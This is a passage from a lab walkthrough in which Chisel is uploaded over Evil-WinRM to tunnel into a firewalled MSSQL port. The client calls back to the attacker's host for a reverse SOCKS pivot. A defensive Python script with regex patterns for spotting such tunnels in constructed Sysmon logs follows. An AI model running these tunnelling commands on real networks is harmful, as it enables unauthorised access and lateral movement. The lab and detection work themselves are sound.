MSSQL


There is an MSSQL instance running on the target port 1433. Since the port is blocked by the firewall, I would need to tunnel it in order to access it from Kali.

Tunneling with Chisel


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ chisel server -p 55555 --reverse --socks5 -v
2025/04/23 21:35:34 server: Reverse tunnelling enabled
2025/04/23 21:35:34 server: Fingerprint bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=
2025/04/23 21:35:34 server: Listening on http://0.0.0.0:55555

Starting a Chisel server on Kali with reverse tunnelling and SOCKS5 enabled, and grabbing its fingerprint (bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=) so the client can pin to it

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> upload chiselx64.exe
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/chiselx64.exe to C:\Users\Christopher.Lewis\Documents\chiselx64.exe
Data: 13014356 bytes of 13014356 bytes copied
 
Info: Upload successful!

Transferring Chisel via the established WinRM session

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> Start-Job { & "C:\Users\Christopher.Lewis\Documents\chiselx64.exe" client -v --fingerprint "bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=" 192.168.45.220:55555 R:48823:socks }
 
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
1      Job1            BackgroundJob   Running       True            localhost             & "C:\Users\Christoph...

Starting the Chisel client as a background job: it connects back to Kali on port 55555 and asks the server to open a reverse SOCKS listener on port 48823

Session established

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ sudo proxychains4 -q nmap -sT $IP -p1433
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 21:00 CEST
Nmap scan report for nagoya.nagoya-industries.com (192.168.158.21)
Host is up (0.031s latency).
 
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
 
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

The target MSSQL instance is now reachable from Kali through the SOCKS proxy.
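From the defender's side, the pivot shown above leaves a recognisable trace in process-creation telemetry: a client launched from a PowerShell/WinRM session whose command line contains a `--fingerprint` pin and an `R:<port>:socks` reverse-SOCKS request. The script below is an added example (not part of the original walkthrough and not Chisel's own code) that runs that check over a few constructed Sysmon-style Event ID 1 records, including a renamed copy of the binary to show the match keys on the command line rather than the file name. The log records, the `FINGERPRINT_PLACEHOLDER` value and the field names are assumptions.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records, reduced to the fields
# the check needs. They are made-up samples modelled on the walkthrough, not real logs.
SAMPLE_EVENTS = [
    {   # the chisel client from the walkthrough, started as a PowerShell background job
        "Image": r"C:\Users\Christopher.Lewis\Documents\chiselx64.exe",
        "CommandLine": r'& "C:\Users\Christopher.Lewis\Documents\chiselx64.exe" client -v '
                       r'--fingerprint "FINGERPRINT_PLACEHOLDER" 192.168.45.220:55555 R:48823:socks',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # the same tool renamed to blend in; the command line still gives it away (constructed)
        "Image": r"C:\Windows\Temp\svchost.exe",
        "CommandLine": r"svchost.exe client 10.0.0.5:8000 R:1080:socks",
        "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
    },
    {   # benign: an outbound download that also carries host:port, must not fire (constructed)
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe http://10.0.0.9:8080/report.json -o report.json",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # benign: ordinary user activity (constructed)
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# "R:[port]:socks" asks the chisel server to open a SOCKS listener on the remote side,
# i.e. a reverse SOCKS pivot into this host's network. "--reverse" is the server-side switch.
REVERSE_SOCKS_RE = re.compile(r"\bR:(?:\S+:)?socks\b", re.IGNORECASE)
CHISEL_CLIENT_RE = re.compile(r"\bclient\b.*\b\S+:\d{1,5}\b", re.IGNORECASE)
REVERSE_SERVER_RE = re.compile(r"\bserver\b.*--reverse\b", re.IGNORECASE)
# Parents that indicate the process was launched from a (remote) PowerShell session;
# wsmprovhost.exe hosts WinRM-backed PowerShell sessions on Windows.
REMOTE_SHELL_PARENTS = {"wsmprovhost.exe", "powershell.exe", "pwsh.exe"}


def classify_event(event):
    """Return the list of tunnel indicators found in one record (empty if none)."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if REVERSE_SOCKS_RE.search(cmd):
        reasons.append("reverse SOCKS tunnel requested (R:...:socks)")
    if REVERSE_SERVER_RE.search(cmd):
        reasons.append("tunnel server started with --reverse")
    if "--fingerprint" in cmd and CHISEL_CLIENT_RE.search(cmd):
        reasons.append("client pinned to a server fingerprint")
    if "chisel" in image:
        reasons.append("binary name contains 'chisel'")
    # Only weigh the parent once something tunnel-related already matched;
    # PowerShell spawning ordinary programs is normal and would otherwise be noise.
    if reasons and parent in REMOTE_SHELL_PARENTS:
        reasons.append(f"spawned from a PowerShell/WinRM host process ({parent})")
    return reasons


def find_reverse_tunnels(events):
    """Return (Image, reasons) for every record carrying at least one tunnel indicator."""
    hits = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            hits.append((ev.get("Image", ""), reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in find_reverse_tunnels(SAMPLE_EVENTS):
        print(image)
        for r in reasons:
            print("  -", r)
```

The parent-process check is deliberately gated on a command-line match: a bare "powershell.exe spawned something" rule fires constantly on a normal host, whereas an `R:...:socks` argument is rarely legitimate. In production the same logic would be fed from Sysmon or PowerShell ScriptBlock logs rather than the inline list, and a matching outbound connection (Sysmon Event ID 3) to an uncommon port from the same process would raise confidence further.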